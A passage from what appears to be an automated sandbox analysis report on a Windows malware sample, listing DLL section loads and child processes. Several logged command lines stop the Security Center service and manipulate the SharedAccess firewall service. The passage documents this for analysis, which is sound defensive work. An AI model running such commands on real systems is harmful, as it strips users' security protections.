Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1603224623
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1603232753
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1603245873
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1603279205
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1603284680
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1603314382
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1603332735
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 8C0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1603440094
Process created	PID: 728 Path: C:\WINDOWS\system32\net1.exe Cmdline: net1 start SharedAccess Createflags: suspended	success or wait	1603453456

Analysis File: net1.exe PID: 1528 Parent PID: 1520

Sections

General
Start time:	07:41:15
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net1.exe
Commandline:	net1 stop Security Center
Imagebase:	0x1000000
File size:	124928 bytes
MD5 hash:	3F14C041342E3FBA343F2A1D11E74BBA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\ntdsapi.dll	query and write and read and execute	image	767A0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1
C:\WINDOWS\system32\netrap.dll	query and write and read and execute	image	71C80000	28672	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1030000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\system32\netmsg.dll	query and write and read and execute	image	71B40000	180224	own pid	read write	success or wait	1	10132A7

Thread Activities:

Thread delayed
TID	Delay	Completion	Count	Source Address
2304	2s	success or wait	1	100B07D

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1604289784
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1604322739
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1604324360
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1604326383
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1604333354
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1604349487
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1604362530
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1604377734
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1604398056
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1604431889
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1604465238
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1604485456
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1604491921
Section loaded	Path: C:\WINDOWS\system32\ntdsapi.dll Access: query and write and read and execute Type: image Baseaddress: 767A0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1604522221
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1604532700
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1604566966
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1604595072
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1604639604
Section loaded	Path: C:\WINDOWS\system32\netrap.dll Access: query and write and read and execute Type: image Baseaddress: 71C80000 Size: 28672 Protection: read write Mapped to pid: own pid	success or wait	1604672908
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1604694365
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1604715159
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1604783315
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1604789978
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1604798769
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1604826372
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1604847411
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1604882383
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1604910201
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1604937299
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1604947223
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1604971748
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1605012386
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1605044804
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1605079909
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1605199606
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1605219821
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1605295363
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1030000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1605889509
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1605973961
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1606023305
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1606096233
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1606120375
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1606126033
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1606191037
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1606254824
Section loaded	Path: C:\WINDOWS\system32\netmsg.dll Access: query and write and read and execute Type: image Baseaddress: 71B40000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1606541561
Thread delayed	Time: 2 TID: 2304	success or wait	1606573987

Analysis File: net1.exe PID: 728 Parent PID: 1452

Sections

General
Start time:	07:41:15
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net1.exe
Commandline:	net1 start SharedAccess
Imagebase:	0x1000000
File size:	124928 bytes
MD5 hash:	3F14C041342E3FBA343F2A1D11E74BBA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\ntdsapi.dll	query and write and read and execute	image	767A0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1
C:\WINDOWS\system32\netrap.dll	query and write and read and execute	image	71C80000	28672	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1030000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\system32\netmsg.dll	query and write and read and execute	image	71B40000	180224	own pid	read write	success or wait	1	10132A7

Thread Activities:

Thread delayed
TID	Delay	Completion	Count	Source Address
1792	2s	success or wait	1	100A0FE

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1604295291
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1604333588
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1604341557
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1604342535
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1604343108
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1604361497
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1604381199
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1604390712
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1604404425
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1604444278
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1604479547
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1604499490
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1604503171
Section loaded	Path: C:\WINDOWS\system32\ntdsapi.dll Access: query and write and read and execute Type: image Baseaddress: 767A0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1604540726
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1604549698
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1604579628
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1604606470
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1604658490
Section loaded	Path: C:\WINDOWS\system32\netrap.dll Access: query and write and read and execute Type: image Baseaddress: 71C80000 Size: 28672 Protection: read write Mapped to pid: own pid	success or wait	1604683422
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1604709766
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1604727646
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1604798365
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1604803307
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1604809642
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1604835408
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1604854711
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1604891288
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1604923343
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1604947460
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1604957740
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1604986895
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1605020549
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1605051103
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1605096106
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1605291424
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1605298425
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1605366355
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1030000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1606031648
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1606086356
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1606097050
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1606195144
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1606201488
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1606206157
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1606248977
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1606302884
Section loaded	Path: C:\WINDOWS\system32\netmsg.dll Access: query and write and read and execute Type: image Baseaddress: 71B40000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1612268326
Thread delayed	Time: 2 TID: 1792	success or wait	1612543225

Analysis File: cmd.exe PID: 1944 Parent PID: 740

Sections

General
Start time:	07:41:16
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c net stop SharedAccess
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	330000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
